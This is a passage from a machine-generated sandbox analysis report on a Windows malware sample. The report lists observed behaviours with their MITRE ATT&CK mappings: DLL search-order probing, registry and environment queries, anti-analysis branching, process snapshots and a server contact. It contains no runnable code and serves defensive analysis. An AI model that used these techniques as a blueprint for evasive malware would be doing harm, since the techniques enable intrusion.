\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75F10000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:4090\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has an writable section named \".data\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has an writable section named \".tls\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\version.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe.Local\\\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe.Local\\\"\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" trying to access non-existent file \"C:\\D65E65C01876DD99A63B3FA6F97710FEE7AD82E63D75CE7F34FD4343E5D9D20A.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"D65E65C01876DD99A63B3FA6F97710FEE7AD82E63D75CE7F34FD4343E5D9D20A\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\"; Key: \"WAITTOKILLSERVICETIMEOUT\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"PRODUCTNAME\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\ASAS-7PH439\"; Key: \"OKMODE\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\ASAS-7PH439\"; Key: \"DEL\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\ASAS-7PH439\"; Key: \"TIME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4690264'}\" (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call EnumServicesStatusW@ADVAPI32.DLL directly followed by \"cmp dword ptr [esp+14h], esi\" and \"jbe 0041AAABh\" at 00000000-00005960-4188-1964-0041A7D9\n Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, FFFFFFFFh\" and \"je 00449511h\" at 00000000-00005960-4188-1066-004493E5", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"IsWow64Process\" with parameter \"5960\" - (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" (Access type: \"QUERYVAL\"; Path: 